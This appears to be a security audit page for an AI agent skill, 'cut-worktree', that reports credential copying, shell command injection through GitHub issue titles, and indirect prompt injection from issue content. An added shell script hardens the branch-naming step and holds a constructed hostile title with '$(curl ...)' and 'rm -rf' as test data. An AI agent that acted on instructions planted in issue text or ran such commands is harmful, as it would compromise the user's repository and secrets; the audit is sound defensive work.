cut-worktree

Warn

Audited by Gen Agent Trust Hub on Mar 17, 2026

Risk Level: MEDIUM
Findings: COMMAND_EXECUTION, CREDENTIALS_UNSAFE, PROMPT_INJECTION
Full Analysis
  • [CREDENTIALS_UNSAFE]: The skill copies .env.local files into each newly created worktree directory. These files frequently hold API keys and other credentials, so every copy is one more place the secrets can leak from (a worktree that is committed, shared, or left behind on disk).
  • [COMMAND_EXECUTION]: The skill runs shell commands through the git and gh CLI tools and interpolates external data, such as GitHub issue titles and descriptions, directly into those command strings. An issue title containing shell metacharacters (`;`, `$(...)`, backticks) would therefore be parsed as commands, which is a significant command injection surface.
  • [PROMPT_INJECTION]: The skill is exposed to indirect prompt injection because it ingests GitHub issue content and acts on it:
  • Ingestion points: External data is fetched from GitHub using gh issue view (Step 2).
  • Boundary markers: No delimiters or safety instructions are used when interpolating issue content into commands or PR bodies.
  • Capability inventory: The skill possesses command execution (git, gh) and file system access (cp) capabilities (Step 5).
  • Sanitization: The skill does not perform any escaping, validation, or sanitization of the retrieved issue content before processing.
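The command injection finding above comes down to one pattern: an issue title is spliced into a shell command string, so the shell interprets any metacharacters it contains. The script below is an added example written for this page, not code from the cut-worktree skill or from Gen Agent Trust Hub. It shows the vulnerable pattern as a comment and then a hardened version: the title is reduced to an allowlisted character set before it becomes part of a branch name, the result is validated again, and the name reaches git only as a separately quoted argument. The issue title is constructed for illustration; `gh` and `git` are called only when installed, so the script also runs offline.

```shell
#!/bin/sh
# Added example (not the skill's own code): turning an untrusted GitHub issue
# title into a branch name without letting it reach the shell as code.
# Constructed sample title, chosen to contain every common injection primitive.
SAMPLE_TITLE='Fix login; $(curl http://evil.example) `id` && rm -rf ~'

# Vulnerable pattern, as the audit describes it: the title is spliced into a
# command string, so ';', '$(...)' and backticks are interpreted by the shell.
#   sh -c "git checkout -b feature/$TITLE"        # DO NOT DO THIS

# Hardened step 1: reduce the title to [a-z0-9-], collapse runs of dashes,
# cap the length, and strip leading/trailing dashes.
slugify() {
  printf '%s' "$1" \
    | tr 'A-Z' 'a-z' \
    | tr -c 'a-z0-9\n' '-' \
    | sed -e 's/-\{2,\}/-/g' \
    | cut -c1-50 \
    | sed -e 's/^-//' -e 's/-$//'
}

# Hardened step 2: the branch name is built from the issue number and the slug
# only; the raw title never appears in it.
branch_for_issue() {
  printf 'issue-%s-%s' "$1" "$(slugify "$2")"
}

# Hardened step 3: an explicit allowlist check before anything touches git.
# Returns 0 for a safe name, 1 otherwise.
is_safe_branch() {
  case "$1" in
    ''|*[!a-z0-9-]*) return 1 ;;
    *) return 0 ;;
  esac
}

# Read the title through gh's structured output rather than scraping text.
# Falls back to the constructed sample when gh is not installed.
issue_title() {
  if command -v gh >/dev/null 2>&1; then
    gh issue view "$1" --json title --jq .title
  else
    printf '%s\n' "$SAMPLE_TITLE"
  fi
}

main() {
  n=42
  case "$n" in *[!0-9]*) echo "issue number must be numeric" >&2; return 1 ;; esac
  title=$(issue_title "$n")
  branch=$(branch_for_issue "$n" "$title")
  if ! is_safe_branch "$branch"; then
    echo "refusing unsafe branch name: $branch" >&2
    return 1
  fi
  # Quoted, separate argument: the shell never parses the title as code.
  # git check-ref-format is git's own validator for ref names.
  if command -v git >/dev/null 2>&1; then
    git check-ref-format --branch "$branch" >/dev/null || return 1
  fi
  echo "$branch"
}

main
```

For the sample title this yields `issue-42-fix-login-curl-http-evil-example-id-rm-rf`: the `$(curl ...)`, backtick and `&&` fragments survive only as inert letters. The same rule applies to the PR body: pass the description as a single quoted argument (or via `--body-file`) and never through `sh -c` or `eval`. Note that this removes the command injection surface only; the prompt injection finding is unaffected, because the agent still reads and acts on the issue text.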
Audit Metadata
Risk Level: MEDIUM
Analyzed: Mar 17, 2026, 01:28 PM